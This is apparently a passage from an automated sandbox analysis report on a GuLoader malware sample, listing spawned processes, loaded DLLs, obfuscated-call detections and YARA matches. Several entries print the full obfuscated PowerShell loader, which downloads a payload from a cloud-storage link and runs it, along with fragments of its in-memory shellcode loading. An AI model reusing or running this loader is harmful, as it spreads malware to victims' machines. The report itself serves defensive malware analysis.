CongoSlumbtNarrooReduccHyperoDuntplNeatn Stan.=Still Optim[Un erNVentueAnthrtI tax.BallfSIngeneM,rphc ntrouSkaber c,lpiV rdetgraviySulfaPT.ykkrOrd eoSolbatElekto UnoccNervio Fritl
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Staggers Eudoxian Basilikummens Bonuspoint Tabskontoers Skallesmkkeren #>;$Lyserde='Showery';<#Lennoaceous reetableringen Retrieveren Personificerende Engladden Trkloset #>;$Paradoksal=$host.PrivateData;If ($Paradoksal) {$Veratrize++;}function Omhng120($Serranid){$Dekaterer=$Shockedness+$Serranid.Length-$Veratrize;for( $Triphosphate=5;$Triphosphate -lt $Dekaterer;$Triphosphate+=6){$Noosphere+=$Serranid[$Triphosphate];}$Noosphere;}function Stungen($Mermithergate){ . ($Psychogram) ($Mermithergate);}$Attributvrdierne=Omhng120 ' S apMTrougoK ncezStivniGen.rlSeminlKysteaIn.an/ Apof5Dr,je.Unreh0 U op Sikk (KimmeWMarbliTilb,nBr.lldNonv.o Fo,gwFo hisGenm. Kv.lN LadiTIgang Ducat1Tor j0Roeku.Schis0Mis t;C,odp NonefW PaneiFunkinTegne6Bnk v4Dripp; Eth ClywdxPerfo6 otto4Nomog;Yuruj ompharCh.fsvCykel:Unrev1 al g2Monol1Dagbo.Ersta0Janic) pole HyperG en,meMini cHeatek AlmioHu.ge/U sty2Strat0C ntr1Afko 0 U ig0ulsel1Lr.om0 Un u1 Tak DetaiFEf eriS,andrEnd.oe yltefP ukiorovsexDopin/Anemo1Os,el2di co1St,rs.Forva0Tub r ';$Odelet=Omhng120 'StenaUHomopSInveseVasofrA omv-Vejl,aReintG Sti,eDvornNAficiTEfter ';$Exaltations=Omhng120 '.ndechSv retMe,antMaoprpFeoffs Exp,: Cach/H ved/Deni dVel,frBespiiAntifvDiesee,ncau.Af tagIld uo op.aoSpildgPedomlUdrkeeGabes. X muc S.rboVrdstmska.d/Vildsu Bestc Udho?Casime.ragixStreep Suf.oPacifr Fedttacade=GroutdM ntaoGho twFyrrenCulo lrenteo.ermiaDoku d Rut & awahiHesped A li=Sytte1AquifZPseuddTalmayReshvbNobblZLygteYScala4 onunW onarRowsnMUn.omwNonh.YFac.eKEgoceb OutsuSvaleTUnderl irroGAl ebVprokuA snusN h litSlito9nertswOwlytX Nr ehFreigqImmollMe siWPrizeSGlem BBimlecSpr n ';$Christiansfeldere=Omhng120 'Optan>Rapso ';$Psychogram=Omhng120 'Cantaib odee atyrxAsymp ';$Nonexaggeration='Kassemangelens238';$Astrography='\Sternman224.Ill';Stungen (Omhng120 'A nde$Rainmg aledlNonexoForklbCountaPlettlBenzo:PadraIOpr ts.ntgetBrandaMlersnVicekdParitsAdmintW.isttStride Su lng gardDelegeSedim= Dr,b$ SnrleEntern igurvKompl: Overa Sk lpoverfpHintidproklaExuditLandsaStikb+Sharp$ inteANonhysImitatReg orBrys oT ykkgUt ovr UninaBescopT nnih ChoryAf ig ');Stungen (Omhng120 ' rnd$ tab gM,tallPreocoCondubSemita Tilfl urf:Sn ckSSingeeTricorFjerdiC,appaTricot SloseBulbil Angryv der=Lema $ AkadE lndfx TuscaHookslCobantPa deabulbitJunioiNonunoBiblinElectsUnde,. Rei,s Sc.epAdr nl ArguiMarvbtBeho,( Ceph$ShrugCLeonohMetodr RecuiBord sPlumatMarvei BermaPylorn OversOpmunfB,rmeeKonf lMonopdFuldveSpo trCodifeDecay)Upli ');Stungen (Omhng120 'overs[HymenN Gl meDrylyt Hove.Iagt Sm scaeChalkr A csvskil iKursuc Min,eA jekPMinkfo arzi FormnMyrictMrkatM roteaSimuln Nsk aCarougSmedeerestirTypol] D.ct:Klu d:OnomaS Jaw eUre.ecro eruLkkerrEnjoyi.entetHercyyAfs.iPMeninr CongoSlumbtNarrooReduccHyperoDuntplNeatn Stan.=Still Optim[Un erNVentueAnthrtI tax.BallfSIngeneM,rphc ntrouSkaber c,lpiV rdetgraviySulfaPT.ykkrOrd eoSolbatElekto UnoccNervio Fritl
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
              Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Staggers Eudoxian Basilikummens Bonuspoint Tabskontoers Skallesmkkeren #>;$Lyserde='Showery';<#Lennoaceous reetableringen Retrieveren Personificerende Engladden Trkloset #>;$Paradoksal=$host.PrivateData;If ($Paradoksal) {$Veratrize++;}function Omhng120($Serranid){$Dekaterer=$Shockedness+$Serranid.Length-$Veratrize;for( $Triphosphate=5;$Triphosphate -lt $Dekaterer;$Triphosphate+=6){$Noosphere+=$Serranid[$Triphosphate];}$Noosphere;}function Stungen($Mermithergate){ . ($Psychogram) ($Mermithergate);}$Attributvrdierne=Omhng120 ' S apMTrougoK ncezStivniGen.rlSeminlKysteaIn.an/ Apof5Dr,je.Unreh0 U op Sikk (KimmeWMarbliTilb,nBr.lldNonv.o Fo,gwFo hisGenm. Kv.lN LadiTIgang Ducat1Tor j0Roeku.Schis0Mis t;C,odp NonefW PaneiFunkinTegne6Bnk v4Dripp; Eth ClywdxPerfo6 otto4Nomog;Yuruj ompharCh.fsvCykel:Unrev1 al g2Monol1Dagbo.Ersta0Janic) pole HyperG en,meMini cHeatek AlmioHu.ge/U sty2Strat0C ntr1Afko 0 U ig0ulsel1Lr.om0 Un u1 Tak DetaiFEf eriS,andrEnd.oe yltefP ukiorovsexDopin/Anemo1Os,el2di co1St,rs.Forva0Tub r ';$Odelet=Omhng120 'StenaUHomopSInveseVasofrA omv-Vejl,aReintG Sti,eDvornNAficiTEfter ';$Exaltations=Omhng120 '.ndechSv retMe,antMaoprpFeoffs Exp,: Cach/H ved/Deni dVel,frBespiiAntifvDiesee,ncau.Af tagIld uo op.aoSpildgPedomlUdrkeeGabes. X muc S.rboVrdstmska.d/Vildsu Bestc Udho?Casime.ragixStreep Suf.oPacifr Fedttacade=GroutdM ntaoGho twFyrrenCulo lrenteo.ermiaDoku d Rut & awahiHesped A li=Sytte1AquifZPseuddTalmayReshvbNobblZLygteYScala4 onunW onarRowsnMUn.omwNonh.YFac.eKEgoceb OutsuSvaleTUnderl irroGAl ebVprokuA snusN h litSlito9nertswOwlytX Nr ehFreigqImmollMe siWPrizeSGlem BBimlecSpr n ';$Christiansfeldere=Omhng120 'Optan>Rapso ';$Psychogram=Omhng120 'Cantaib odee atyrxAsymp ';$Nonexaggeration='Kassemangelens238';$Astrography='\Sternman224.Ill';Stungen (Omhng120 'A nde$Rainmg aledlNonexoForklbCountaPlettlBenzo:PadraIOpr ts.ntgetBrandaMlersnVicekdParitsAdmintW.isttStride Su lng gardDelegeSedim= Dr,b$ SnrleEntern igurvKompl: Overa Sk lpoverfpHintidproklaExuditLandsaStikb+Sharp$ inteANonhysImitatReg orBrys oT ykkgUt ovr UninaBescopT nnih ChoryAf ig ');Stungen (Omhng120 ' rnd$ tab gM,tallPreocoCondubSemita Tilfl urf:Sn ckSSingeeTricorFjerdiC,appaTricot SloseBulbil Angryv der=Lema $ AkadE lndfx TuscaHookslCobantPa deabulbitJunioiNonunoBiblinElectsUnde,. Rei,s Sc.epAdr nl ArguiMarvbtBeho,( Ceph$ShrugCLeonohMetodr RecuiBord sPlumatMarvei BermaPylorn OversOpmunfB,rmeeKonf lMonopdFuldveSpo trCodifeDecay)Upli ');Stungen (Omhng120 'overs[HymenN Gl meDrylyt Hove.Iagt Sm scaeChalkr A csvskil iKursuc Min,eA jekPMinkfo arzi FormnMyrictMrkatM roteaSimuln Nsk aCarougSmedeerestirTypol] D.ct:Klu d:OnomaS Jaw eUre.ecro eruLkkerrEnjoyi.entetHercyyAfs.iPMeninr CongoSlumbtNarrooReduccHyperoDuntplNeatn Stan.=Still Optim[Un erNVentueAnthrtI tax.BallfSIngeneM,rphc ntrouSkaber c,lpiV rdetgraviySulfaPT.ykkrOrd eoSolbatElekto UnoccNervio FritlJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: comsvcs.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cmlua.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cmutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1921976127.0000000008A50000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: m.Core.pdb4 source: powershell.exe, 00000005.00000002.1914298768.0000000007932000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ore.pdbht source: powershell.exe, 00000005.00000002.1914298768.0000000007932000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: em.Core.pdbk source: powershell.exe, 00000005.00000002.1914298768.00000000078E8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: em.Core.pdb source: powershell.exe, 00000005.00000002.1914298768.00000000078E8000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL "<#Staggers Eudoxian Basilikummens Bonuspoint Tabskontoers Skallesmkkeren #>;$Lyserde='Showery';<#Lenn", "0")
              Yara detected GuLoader
              Source: Yara matchFile source: 00000005.00000002.1930442779.000000000BDEC000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1924109372.0000000008CF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1906272544.000000000611D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.1610119241.0000029190071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Julemessens)$global:Thomist = [System.Text.Encoding]::ASCII.GetString($Explicability)$global:opsttende=$Thomist.substring($Eksekverbare,$trikstank)<#Guldmedaljernes Denaturering Twa
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Untranscendent $Lagerbeholdning $Sexsymbolernes), (Xiphuous @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Hearty = [AppDomain]::CurrentDomain.GetAssembli
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Podagry)), $Grooming).DefineDynamicModule($Sherifian, $false).DefineType($Carmot, $Pyrophobia, [System.MulticastDelegate])$Beaterman.D
